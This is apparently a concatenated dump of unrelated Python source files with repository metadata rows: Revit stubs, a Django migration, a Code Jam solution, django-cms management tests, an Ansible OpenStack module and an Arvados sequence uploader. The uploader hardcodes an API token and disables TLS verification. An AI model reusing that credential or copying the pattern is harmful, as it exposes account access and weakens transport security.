# The payload of our message starts as a simple dictionary. Before sending
# the HTTP message, we will format this into a json object
payload = {
'time': str(datetime.now()),
'event': "Moving Right"
}
while True:
# Send an HTTP POST message and block until a response is given.
# Note: requests() is NOT the same thing as request() under the flask
# library.
response = requests.post("http://0.0.0.0:5000/post-event", headers = hdr,
data = json.dumps(payload))
# Print the json object from the HTTP response
print(response.json())
time.sleep(2)
| 33.473684 | 81 | 0.654874 |
4a225e335db7cc764d86099e881896e4083e6576 | 981 | py | Python | stubs.min/Autodesk/Revit/DB/__init___parts/DigitGroupingAmount.py | denfromufa/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | 1 | 2017-07-07T11:15:45.000Z | 2017-07-07T11:15:45.000Z | stubs.min/Autodesk/Revit/DB/__init___parts/DigitGroupingAmount.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | stubs.min/Autodesk/Revit/DB/__init___parts/DigitGroupingAmount.py | hdm-dt-fb/ironpython-stubs | 4d2b405eda3ceed186e8adca55dd97c332c6f49d | [
"MIT"
] | null | null | null | class DigitGroupingAmount(Enum,IComparable,IFormattable,IConvertible):
"""
The number of digits in each group when numbers are formatted with digit grouping.
enum DigitGroupingAmount,values: Three (1),Two (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Three=None
Two=None
value__=None
| 28.852941 | 215 | 0.667686 |
4a225e7671a95988f6f9452c6d26d5f01d3da1ad | 48 | py | Python | 01-Lesson-Plans/06-Python-APIs/3/Extra_Content/01-Stu_Wrapper_Recap/Unsolved/config.py | anirudhmungre/sneaky-lessons | 8e48015c50865059db96f8cd369bcc15365d66c7 | [
"ADSL"
] | null | null | null | 01-Lesson-Plans/06-Python-APIs/3/Extra_Content/01-Stu_Wrapper_Recap/Unsolved/config.py | anirudhmungre/sneaky-lessons | 8e48015c50865059db96f8cd369bcc15365d66c7 | [
"ADSL"
] | null | null | null | 01-Lesson-Plans/06-Python-APIs/3/Extra_Content/01-Stu_Wrapper_Recap/Unsolved/config.py | anirudhmungre/sneaky-lessons | 8e48015c50865059db96f8cd369bcc15365d66c7 | [
"ADSL"
] | null | null | null | # Enter your API key
api_key = "YOUR KEY HERE!"
| 16 | 26 | 0.6875 |
4a225eba0223eda7bb3b9a28af9d49e1e8db94cf | 380 | py | Python | bkrv/main/migrations/0020_review_rating.py | vuduc153/Restaurants-Review-Django | 08caf2fde8f169436de916ad73a037b891e6735d | [
"MIT"
] | null | null | null | bkrv/main/migrations/0020_review_rating.py | vuduc153/Restaurants-Review-Django | 08caf2fde8f169436de916ad73a037b891e6735d | [
"MIT"
] | 8 | 2019-06-22T09:20:38.000Z | 2022-02-10T11:35:45.000Z | bkrv/main/migrations/0020_review_rating.py | vuduc153/Restaurants-Review-Django | 08caf2fde8f169436de916ad73a037b891e6735d | [
"MIT"
] | null | null | null | # Generated by Django 2.2.2 on 2019-06-26 17:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0019_auto_20190626_1735'),
]
operations = [
migrations.AddField(
model_name='review',
name='rating',
field=models.IntegerField(default=0),
),
]
| 20 | 49 | 0.592105 |
4a225ee588dd34c73a8181d6955fda284df5b3c3 | 1,234 | py | Python | Codejam/Codejam 2022/Round1A/DoubleOrOne.py | patricklee90/CompetitiveProgramming | 422068dbbbd2f1593e965288514cc3956724b2e8 | [
"MIT"
] | null | null | null | Codejam/Codejam 2022/Round1A/DoubleOrOne.py | patricklee90/CompetitiveProgramming | 422068dbbbd2f1593e965288514cc3956724b2e8 | [
"MIT"
] | null | null | null | Codejam/Codejam 2022/Round1A/DoubleOrOne.py | patricklee90/CompetitiveProgramming | 422068dbbbd2f1593e965288514cc3956724b2e8 | [
"MIT"
] | null | null | null | '''
Question Link: https://codingcompetitions.withgoogle.com/codejam/round/0000000000877ba5/0000000000aa8e9c
Solution Explanation:
1. https://www.youtube.com/watch?v=ZdpSR4L09NI&ab_channel=HappyCoding
'''
from multiprocessing import pool
import copy
import sys
class Solution:
def doubleOrOne(self, stringExp):
res = ""
last = '\0'
cnt = 0
for i in range(len(stringExp)):
print(f"i:{i}, string[i]:{stringExp[i]}, last:{last}, last<str[i]?:{last < stringExp[i]}, cnt:{cnt}")
if stringExp[i] != last:
if(last < stringExp[i]):
cnt*=2
print(f"cnt:{cnt}", end=" ")
while cnt>0:
cnt -=1
res += last
print(f", res:{res}")
last = stringExp[i]
cnt = 0
cnt +=1
while cnt>0:
cnt -=1
res += last
print(res)
stringLink = [
"PEEL",
"AAAAAAAAAA",
"CODEJAMDAY",
]
solution = Solution()
for id, stringExp in enumerate(stringLink):
print(f'Case #{id+1}:',end = ' ')
solution.doubleOrOne(stringExp) | 26.255319 | 113 | 0.497569 |
4a225f6e3f5144c86a172bb65bf0969cbe8df0af | 1,987 | py | Python | bh20sequploader/main.py | heuermh/bh20-seq-resource | fc872f15da426926414fb7629bf6660d9880ed1e | [
"Apache-2.0"
] | null | null | null | bh20sequploader/main.py | heuermh/bh20-seq-resource | fc872f15da426926414fb7629bf6660d9880ed1e | [
"Apache-2.0"
] | null | null | null | bh20sequploader/main.py | heuermh/bh20-seq-resource | fc872f15da426926414fb7629bf6660d9880ed1e | [
"Apache-2.0"
] | null | null | null | import argparse
import time
import arvados
import arvados.collection
import json
import magic
from pathlib import Path
import urllib.request
import socket
import getpass
from .qc_metadata import qc_metadata
from .qc_fasta import qc_fasta
ARVADOS_API_HOST='lugli.arvadosapi.com'
ARVADOS_API_TOKEN='2fbebpmbo3rw3x05ueu2i6nx70zhrsb1p22ycu3ry34m4x4462'
UPLOAD_PROJECT='lugli-j7d0g-n5clictpuvwk8aa'
def main():
parser = argparse.ArgumentParser(description='Upload SARS-CoV-19 sequences for analysis')
parser.add_argument('sequence', type=argparse.FileType('r'), help='sequence FASTA/FASTQ')
parser.add_argument('metadata', type=argparse.FileType('r'), help='sequence metadata json')
args = parser.parse_args()
api = arvados.api(host=ARVADOS_API_HOST, token=ARVADOS_API_TOKEN, insecure=True)
target = qc_fasta(args.sequence)
if not qc_metadata(args.metadata.name):
print("Failed metadata qc")
exit(1)
col = arvados.collection.Collection(api_client=api)
with col.open(target, "w") as f:
r = args.sequence.read(65536)
print(r[0:20])
while r:
f.write(r)
r = args.sequence.read(65536)
args.sequence.close()
print("Reading metadata")
with col.open("metadata.yaml", "w") as f:
r = args.metadata.read(65536)
print(r[0:20])
while r:
f.write(r)
r = args.metadata.read(65536)
args.metadata.close()
external_ip = urllib.request.urlopen('https://ident.me').read().decode('utf8')
properties = {
"upload_app": "bh20-seq-uploader",
"upload_ip": external_ip,
"upload_user": "%s@%s" % (getpass.getuser(), socket.gethostname())
}
col.save_new(owner_uuid=UPLOAD_PROJECT, name="Uploaded by %s from %s" %
(properties['upload_user'], properties['upload_ip']),
properties=properties, ensure_unique_name=True)
print("Done")
if __name__ == "__main__":
main()
| 29.656716 | 95 | 0.672874 |
4a225f76ea45b9976d450cb7f5c1422b03db903e | 26,875 | py | Python | cms/tests/test_management.py | Mario-Kart-Felix/django-cms | 6d68439fe7fd59d000f99e27c1f2135a3f9c816a | [
"BSD-3-Clause"
] | 1 | 2021-02-11T16:20:01.000Z | 2021-02-11T16:20:01.000Z | cms/tests/test_management.py | vlctt/django-cms | eeb86fd70c86b0cdac5f3959995b92de8d100771 | [
"BSD-3-Clause"
] | 2 | 2020-10-28T13:48:53.000Z | 2020-10-28T13:52:48.000Z | cms/tests/test_management.py | vlctt/django-cms | eeb86fd70c86b0cdac5f3959995b92de8d100771 | [
"BSD-3-Clause"
] | 1 | 2021-07-26T14:43:54.000Z | 2021-07-26T14:43:54.000Z | import io
import uuid
from cms.test_utils.project.sampleapp.cms_apps import SampleApp
from cms.test_utils.util.context_managers import apphooks
from django.conf import settings
from django.contrib.sites.models import Site
from django.core import management
from django.core.management import CommandError
from django.test.utils import override_settings
from cms.api import create_page, add_plugin, create_title
from cms.management.commands.subcommands.list import plugin_report
from cms.models import Page, StaticPlaceholder
from cms.models.placeholdermodel import Placeholder
from cms.models.pluginmodel import CMSPlugin
from cms.test_utils.fixtures.navextenders import NavextendersFixture
from cms.test_utils.testcases import CMSTestCase
from djangocms_text_ckeditor.cms_plugins import TextPlugin
APPHOOK = "SampleApp"
PLUGIN = "TextPlugin"
TEST_INSTALLED_APPS = [
"django.contrib.auth",
"cms",
"menus",
"sekizai",
"treebeard",
] + settings.PLUGIN_APPS
if settings.AUTH_USER_MODEL == "emailuserapp.EmailUser":
TEST_INSTALLED_APPS.append("cms.test_utils.project.emailuserapp")
if settings.AUTH_USER_MODEL == "customuserapp.User":
TEST_INSTALLED_APPS.append("cms.test_utils.project.customuserapp")
class ManagementTestCase(CMSTestCase):
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_list_apphooks(self):
with apphooks(SampleApp):
out = io.StringIO()
create_page('Hello Title', "nav_playground.html", "en", apphook=APPHOOK)
self.assertEqual(Page.objects.filter(application_urls=APPHOOK).count(), 1)
management.call_command(
"cms",
"list",
"apphooks",
interactive=False,
stdout=out,
)
self.assertEqual(out.getvalue(), "SampleApp (draft)\n")
def test_uninstall_apphooks_without_apphook(self):
with apphooks():
out = io.StringIO()
management.call_command(
"cms",
"uninstall",
"apphooks",
APPHOOK,
interactive=False,
stdout=out,
)
self.assertEqual(out.getvalue(), "no 'SampleApp' apphooks found\n")
def test_fix_tree(self):
create_page("home", "nav_playground.html", "en")
page1 = create_page("page", "nav_playground.html", "en")
page1.node.depth = 3
page1.node.numchild = 4
page1.node.path = "00100010"
page1.node.save()
out = io.StringIO()
management.call_command('cms', 'fix-tree', interactive=False, stdout=out)
self.assertEqual(out.getvalue(), 'fixing page tree\nfixing plugin tree\nall done\n')
page1 = page1.reload()
self.assertEqual(page1.node.path, "0002")
self.assertEqual(page1.node.depth, 1)
self.assertEqual(page1.node.numchild, 0)
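# django-treebeard materialized paths encode ancestry in fixed-width steps
# (4 characters per level by default), so the corrupted '00100010' claimed
# depth 3, while the repaired '0002' at depth 1 simply marks this page as
# the second root node.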
def test_fix_tree_regression_5641(self):
# ref: https://github.com/divio/django-cms/issues/5641
alpha = create_page("Alpha", "nav_playground.html", "en", published=True)
beta = create_page("Beta", "nav_playground.html", "en", published=False)
gamma = create_page("Gamma", "nav_playground.html", "en", published=False)
delta = create_page("Delta", "nav_playground.html", "en", published=True)
theta = create_page("Theta", "nav_playground.html", "en", published=True)
beta.move_page(alpha.node, position='last-child')
gamma.move_page(beta.node, position='last-child')
delta.move_page(gamma.node, position='last-child')
theta.move_page(delta.node, position='last-child')
out = io.StringIO()
management.call_command('cms', 'fix-tree', interactive=False, stdout=out)
tree = [
(alpha, '0001'),
(beta, '00010001'),
(gamma, '000100010001'),
(delta, '0001000100010001'),
(theta, '00010001000100010001'),
]
for page, path in tree:
self.assertEqual(page.node.path, path)
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_uninstall_apphooks_with_apphook(self):
with apphooks(SampleApp):
out = io.StringIO()
create_page('Hello Title', "nav_playground.html", "en", apphook=APPHOOK)
self.assertEqual(Page.objects.filter(application_urls=APPHOOK).count(), 1)
management.call_command(
"cms",
"uninstall",
"apphooks",
APPHOOK,
interactive=False,
stdout=out,
)
self.assertEqual(out.getvalue(), "1 'SampleApp' apphooks uninstalled\n")
self.assertEqual(Page.objects.filter(application_urls=APPHOOK).count(), 0)
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_list_plugins(self):
out = io.StringIO()
placeholder = Placeholder.objects.create(slot="test")
add_plugin(placeholder, TextPlugin, "en", body="en body")
add_plugin(placeholder, TextPlugin, "en", body="en body")
link_plugin = add_plugin(placeholder, "LinkPlugin", "en",
name="A Link", external_link="https://www.django-cms.org")
self.assertEqual(
CMSPlugin.objects.filter(plugin_type=PLUGIN).count(),
2)
self.assertEqual(
CMSPlugin.objects.filter(plugin_type="LinkPlugin").count(),
1)
# create a CMSPlugin with an unsaved instance
instanceless_plugin = CMSPlugin(language="en", plugin_type="TextPlugin")
instanceless_plugin.save()
# create a bogus CMSPlugin to simulate one which used to exist but
# is no longer installed
bogus_plugin = CMSPlugin(language="en", plugin_type="BogusPlugin")
bogus_plugin.save()
management.call_command('cms', 'list', 'plugins', interactive=False, stdout=out)
report = plugin_report()
# there should be reports for three plugin types
self.assertEqual(
len(report),
3)
# check the bogus plugin
bogus_plugins_report = report[0]
self.assertEqual(
bogus_plugins_report["model"],
None)
self.assertEqual(
bogus_plugins_report["type"],
u'BogusPlugin')
self.assertEqual(
bogus_plugins_report["instances"][0],
bogus_plugin)
# check the link plugin
link_plugins_report = report[1]
self.assertEqual(
link_plugins_report["model"],
link_plugin.__class__)
self.assertEqual(
link_plugins_report["type"],
u'LinkPlugin')
self.assertEqual(
link_plugins_report["instances"][0].get_plugin_instance()[0],
link_plugin)
# check the text plugins
text_plugins_report = report[2]
self.assertEqual(
text_plugins_report["model"],
TextPlugin.model)
self.assertEqual(
text_plugins_report["type"],
u'TextPlugin')
self.assertEqual(
len(text_plugins_report["instances"]),
3)
self.assertEqual(
text_plugins_report["instances"][2],
instanceless_plugin)
self.assertEqual(
text_plugins_report["unsaved_instances"],
[instanceless_plugin])
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_delete_orphaned_plugins(self):
placeholder = Placeholder.objects.create(slot="test")
add_plugin(placeholder, TextPlugin, "en", body="en body")
add_plugin(placeholder, TextPlugin, "en", body="en body")
add_plugin(placeholder, "LinkPlugin", "en",
name="A Link", external_link="https://www.django-cms.org")
instanceless_plugin = CMSPlugin(
language="en", plugin_type="TextPlugin")
instanceless_plugin.save()
# create a bogus CMSPlugin to simulate one which used to exist but
# is no longer installed
bogus_plugin = CMSPlugin(language="en", plugin_type="BogusPlugin")
bogus_plugin.save()
report = plugin_report()
# there should be reports for three plugin types
self.assertEqual(
len(report),
3)
# check the bogus plugin
bogus_plugins_report = report[0]
self.assertEqual(
len(bogus_plugins_report["instances"]),
1)
# check the link plugin
link_plugins_report = report[1]
self.assertEqual(
len(link_plugins_report["instances"]),
1)
# check the text plugins
text_plugins_report = report[2]
self.assertEqual(
len(text_plugins_report["instances"]),
3)
self.assertEqual(
len(text_plugins_report["unsaved_instances"]),
1)
out = io.StringIO()
management.call_command('cms', 'delete-orphaned-plugins', interactive=False, stdout=out)
report = plugin_report()
# there should be reports for two plugin types (one should have been deleted)
self.assertEqual(
len(report),
2)
# check the link plugin
link_plugins_report = report[0]
self.assertEqual(
len(link_plugins_report["instances"]),
1)
# check the text plugins
text_plugins_report = report[1]
self.assertEqual(
len(text_plugins_report["instances"]),
2)
self.assertEqual(
len(text_plugins_report["unsaved_instances"]),
0)
def test_uninstall_plugins_without_plugin(self):
out = io.StringIO()
management.call_command('cms', 'uninstall', 'plugins', PLUGIN, interactive=False, stdout=out)
self.assertEqual(out.getvalue(), "no 'TextPlugin' plugins found\n")
@override_settings(INSTALLED_APPS=TEST_INSTALLED_APPS)
def test_uninstall_plugins_with_plugin(self):
out = io.StringIO()
placeholder = Placeholder.objects.create(slot="test")
add_plugin(placeholder, TextPlugin, "en", body="en body")
self.assertEqual(CMSPlugin.objects.filter(plugin_type=PLUGIN).count(), 1)
management.call_command('cms', 'uninstall', 'plugins', PLUGIN, interactive=False, stdout=out)
self.assertEqual(out.getvalue(), "1 'TextPlugin' plugins uninstalled\n")
self.assertEqual(CMSPlugin.objects.filter(plugin_type=PLUGIN).count(), 0)
def test_publisher_public(self):
admin = self.get_superuser()
create_page(
'home',
published=True,
language='de',
template='nav_playground.html',
created_by=admin,
)
page_1 = create_page(
'página 1',
published=True,
language='de',
template='nav_playground.html',
created_by=admin,
)
page_1.unpublish('de')
page_2 = create_page(
'página 2',
published=True,
language='de',
template='nav_playground.html',
created_by=admin,
)
page_2.unpublish('de')
management.call_command(
'cms',
'publisher-publish',
'-l de',
'--unpublished',
interactive=False,
)
self.assertEqual(Page.objects.public().count(), 3)
class PageFixtureManagementTestCase(NavextendersFixture, CMSTestCase):
def _fill_page_body(self, page, lang):
ph_en = page.placeholders.get(slot="body")
# add misc plugins
mcol1 = add_plugin(ph_en, "MultiColumnPlugin", lang, position="first-child")
add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol1)
col2 = add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol1)
mcol2 = add_plugin(ph_en, "MultiColumnPlugin", lang, position="first-child", target=col2)
add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol2)
col4 = add_plugin(ph_en, "ColumnPlugin", lang, position="first-child", target=mcol2)
# add a *nested* link plugin
add_plugin(ph_en, "LinkPlugin", lang, target=col4,
name="A Link", external_link="https://www.django-cms.org")
static_placeholder = StaticPlaceholder(code=str(uuid.uuid4()), site_id=1)
static_placeholder.save()
add_plugin(static_placeholder.draft, "TextPlugin", lang, body="example content")
def setUp(self):
pages = Page.objects.drafts()
for page in pages:
self._fill_page_body(page, "en")
def test_copy_langs(self):
"""
Various checks here:
* plugins are exactly doubled, half per language with no orphaned plugin
* the bottom-most plugins in the nesting chain maintain the same position and the same content
* the top-most plugin are of the same type
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', interactive=False, stdout=out
)
pages = Page.objects.on_site(site).drafts()
for page in pages:
self.assertEqual(set((u'en', u'de')), set(page.get_languages()))
# These asserts that no orphaned plugin exists
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins*2)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins)
root_page = Page.objects.get_home(site)
root_plugins = CMSPlugin.objects.filter(placeholder=root_page.placeholders.get(slot="body"))
first_plugin_en, _ = root_plugins.get(language='en', parent=None).get_plugin_instance()
first_plugin_de, _ = root_plugins.get(language='de', parent=None).get_plugin_instance()
self.assertEqual(first_plugin_en.plugin_type, first_plugin_de.plugin_type)
link_en, _ = root_plugins.get(language='en', plugin_type='LinkPlugin').get_plugin_instance()
link_de, _ = root_plugins.get(language='de', plugin_type='LinkPlugin').get_plugin_instance()
self.assertEqual(link_en.external_link, link_de.external_link)
self.assertEqual(link_en.get_position_in_placeholder(), link_de.get_position_in_placeholder())
stack_plugins = CMSPlugin.objects.filter(placeholder=StaticPlaceholder.objects.order_by('?')[0].draft)
stack_text_en, _ = stack_plugins.get(language='en', plugin_type='TextPlugin').get_plugin_instance()
stack_text_de, _ = stack_plugins.get(language='de', plugin_type='TextPlugin').get_plugin_instance()
self.assertEqual(stack_text_en.plugin_type, stack_text_de.plugin_type)
self.assertEqual(stack_text_en.body, stack_text_de.body)
def test_copy_langs_no_content(self):
"""
Various checks here:
* page structure is copied
* no plugin is copied
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', '--skip-content',
interactive=False, stdout=out
)
pages = Page.objects.on_site(site).drafts()
for page in pages:
self.assertEqual(set((u'en', u'de')), set(page.get_languages()))
        # These assert that no orphaned plugins exist
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), 0)
root_page = Page.objects.get_home(site)
root_plugins = CMSPlugin.objects.filter(
placeholder=root_page.placeholders.get(slot="body"))
first_plugin_en, _ = root_plugins.get(language='en', parent=None).get_plugin_instance()
first_plugin_de = None
with self.assertRaises(CMSPlugin.DoesNotExist):
first_plugin_de, _ = root_plugins.get(language='de', parent=None).get_plugin_instance()
self.assertIsNone(first_plugin_de)
stack_plugins = CMSPlugin.objects.filter(
placeholder=StaticPlaceholder.objects.order_by('?')[0].draft)
stack_text_en, _ = stack_plugins.get(language='en',
plugin_type='TextPlugin').get_plugin_instance()
with self.assertRaises(CMSPlugin.DoesNotExist):
stack_text_de, _ = stack_plugins.get(language='de',
plugin_type='TextPlugin').get_plugin_instance()
def test_copy_sites(self):
"""
Various checks here:
* plugins are exactly doubled, half per site with no orphaned plugin
* the bottom-most plugins in the nesting chain maintain the same position and the same content
        * the top-most plugins are of the same type
"""
site_1_pk = 1
site_1 = Site.objects.get(pk=site_1_pk)
site_2 = Site.objects.create(name='site 2')
site_2_pk = site_2.pk
phs = []
for page in Page.objects.on_site(site_1_pk).drafts():
phs.extend(page.placeholders.values_list('pk', flat=True))
number_start_plugins = CMSPlugin.objects.filter(placeholder__in=phs).count()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'site', '--from-site=%s' % site_1_pk, '--to-site=%s' % site_2_pk,
stdout=out
)
for page in Page.objects.on_site(site_1_pk).drafts():
page.publish('en')
for page in Page.objects.on_site(site_2_pk).drafts():
page.publish('en')
pages_1 = list(Page.objects.drafts().on_site(site_1).select_related('node').order_by('node__path'))
pages_2 = list(Page.objects.drafts().on_site(site_2).select_related('node').order_by('node__path'))
for index, page in enumerate(pages_1):
self.assertEqual(page.get_title('en'), pages_2[index].get_title('en'))
self.assertEqual(page.node.depth, pages_2[index].node.depth)
phs_1 = []
phs_2 = []
for page in Page.objects.on_site(site_1_pk).drafts():
phs_1.extend(page.placeholders.values_list('pk', flat=True))
for page in Page.objects.on_site(site_2_pk).drafts():
phs_2.extend(page.placeholders.values_list('pk', flat=True))
        # These assert that no orphaned plugins exist
self.assertEqual(CMSPlugin.objects.filter(placeholder__in=phs_1).count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(placeholder__in=phs_2).count(), number_start_plugins)
root_page_1 = Page.objects.get_home(site_1)
root_page_2 = Page.objects.get_home(site_2)
root_plugins_1 = CMSPlugin.objects.filter(placeholder=root_page_1.placeholders.get(slot="body"))
root_plugins_2 = CMSPlugin.objects.filter(placeholder=root_page_2.placeholders.get(slot="body"))
first_plugin_1, _ = root_plugins_1.get(language='en', parent=None).get_plugin_instance()
first_plugin_2, _ = root_plugins_2.get(language='en', parent=None).get_plugin_instance()
self.assertEqual(first_plugin_1.plugin_type, first_plugin_2.plugin_type)
link_1, _ = root_plugins_1.get(language='en', plugin_type='LinkPlugin').get_plugin_instance()
link_2, _ = root_plugins_2.get(language='en', plugin_type='LinkPlugin').get_plugin_instance()
self.assertEqual(link_1.external_link, link_2.external_link)
self.assertEqual(link_1.get_position_in_placeholder(), link_2.get_position_in_placeholder())
def test_copy_existing_title(self):
"""
        Even if a title already exists, the copy is successful and the original
        title remains untouched
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
# create an empty title language
root_page = Page.objects.get_home(site)
create_title("de", "root page de", root_page)
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', interactive=False, stdout=out
)
pages = Page.objects.on_site(site).drafts()
for page in pages:
self.assertEqual(set((u'en', u'de')), set(page.get_languages()))
# Original Title untouched
self.assertEqual("root page de", Page.objects.get_home(site).get_title("de"))
# Plugins still copied
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins*2)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins)
def test_copy_filled_placeholder(self):
"""
If an existing title in the target language has plugins in a placeholder
that placeholder is skipped
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
# create an empty title language
root_page = Page.objects.get_home(site)
create_title("de", "root page de", root_page)
ph = root_page.placeholders.get(slot="body")
add_plugin(ph, "TextPlugin", "de", body="Hello World")
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', interactive=False, stdout=out
)
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
# one placeholder (with 7 plugins) is skipped, so the difference must be 6
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins-6)
def test_copy_filled_placeholder_force_copy(self):
"""
If an existing title in the target language has plugins in a placeholder
and the command is called with *force-copy*, the plugins are copied on
top of the existing one
"""
site = 1
number_start_plugins = CMSPlugin.objects.all().count()
# create an empty title language
root_page = Page.objects.get_home(site)
create_title("de", "root page de", root_page)
ph = root_page.placeholders.get(slot="body")
add_plugin(ph, "TextPlugin", "de", body="Hello World")
root_plugins = CMSPlugin.objects.filter(placeholder=ph)
text_de_orig, _ = root_plugins.get(language='de', plugin_type='TextPlugin').get_plugin_instance()
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=en', '--to-lang=de', '--force', interactive=False,
stdout=out
)
CMSPlugin.objects.filter(placeholder=root_page.placeholders.get(slot="body"))
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
# we have an existing plugin in one placeholder, so we have one more
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_start_plugins+1)
def test_copy_from_non_existing_lang(self):
"""
        When copying from a language that is not defined on the pages, every
        page is skipped and a message is reported for each one
"""
site = 1
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=de', '--to-lang=fr', verbosity=3,
interactive=False, stdout=out
)
text = out.getvalue()
page_count = Page.objects.on_site(site).drafts().count() + 1
for idx in range(1, page_count):
self.assertTrue("Skipping page page%d, language de not defined" % idx in text)
def test_copy_site_safe(self):
"""
Check that copy of languages on one site does not interfere with other
sites
"""
site_other = 1
site_active = 2
origina_site1_langs = {}
number_start_plugins = CMSPlugin.objects.all().count()
site_obj = Site.objects.create(domain="sample2.com", name="sample2.com", pk=site_active)
for page in Page.objects.on_site(1).drafts():
origina_site1_langs[page.pk] = set(page.get_languages())
p1 = create_page('page1', published=True, in_navigation=True, language='de', template='nav_playground.html', site=site_obj)
create_page('page4', published=True, in_navigation=True, language='de', template='nav_playground.html', site=site_obj)
create_page('page2', published=True, in_navigation=True, parent=p1, language='de', template='nav_playground.html', site=site_obj)
for page in Page.objects.on_site(site_active).drafts():
self._fill_page_body(page, 'de')
number_site2_plugins = CMSPlugin.objects.all().count() - number_start_plugins
out = io.StringIO()
management.call_command(
'cms', 'copy', 'lang', '--from-lang=de', '--to-lang=fr', '--site=%s' % site_active,
interactive=False, stdout=out
)
for page in Page.objects.on_site(site_other).drafts():
self.assertEqual(origina_site1_langs[page.pk], set(page.get_languages()))
for page in Page.objects.on_site(site_active).drafts():
self.assertEqual(set(('de', 'fr')), set(page.get_languages()))
# plugins for site 1
self.assertEqual(CMSPlugin.objects.filter(language='en').count(), number_start_plugins)
# plugins for site 2 de
self.assertEqual(CMSPlugin.objects.filter(language='de').count(), number_site2_plugins)
# plugins for site 2 fr
self.assertEqual(CMSPlugin.objects.filter(language='fr').count(), number_site2_plugins)
# global number of plugins
self.assertEqual(CMSPlugin.objects.all().count(), number_start_plugins + number_site2_plugins*2)
def test_copy_bad_languages(self):
out = io.StringIO()
with self.assertRaises(CommandError) as command_error:
management.call_command(
'cms', 'copy', 'lang', '--from-lang=it', '--to-lang=fr', interactive=False,
stdout=out
)
self.assertEqual(str(command_error.exception), 'Both languages have to be present in settings.LANGUAGES and settings.CMS_LANGUAGES')
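# For reference, the call_command() invocations exercised above correspond
# roughly to shell commands of the form (assuming the project's manage.py):
#   python manage.py cms copy lang --from-lang=en --to-lang=de
#   python manage.py cms copy site --from-site=1 --to-site=2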
| 40.905632 | 140 | 0.63814 |
4a22604ed87eb6f35778b15756b9a5526a8c95d4 | 3,503 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/openstack/cloud/plugins/modules/os_object.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | ["MIT"] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/openstack/cloud/plugins/modules/os_object.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | ["MIT"] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/openstack/cloud/plugins/modules/os_object.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | ["MIT"] | null | null | null |
#!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013, Benno Joy <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
DOCUMENTATION = '''
---
module: object
short_description: Create or Delete objects and containers from OpenStack
author: OpenStack Ansible SIG
description:
- Create or Delete objects and containers from OpenStack
options:
container:
description:
- The name of the container in which to create the object
required: true
type: str
name:
description:
      - Name to be given to the object. If omitted, operations will be on
the entire container
required: false
type: str
filename:
description:
- Path to local file to be uploaded.
required: false
type: str
container_access:
description:
- desired container access level.
required: false
choices: ['private', 'public']
default: private
type: str
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
type: str
requirements:
- "python >= 3.6"
- "openstacksdk"
extends_documentation_fragment:
- openstack.cloud.openstack
'''
EXAMPLES = '''
- name: "Create a object named 'fstab' in the 'config' container"
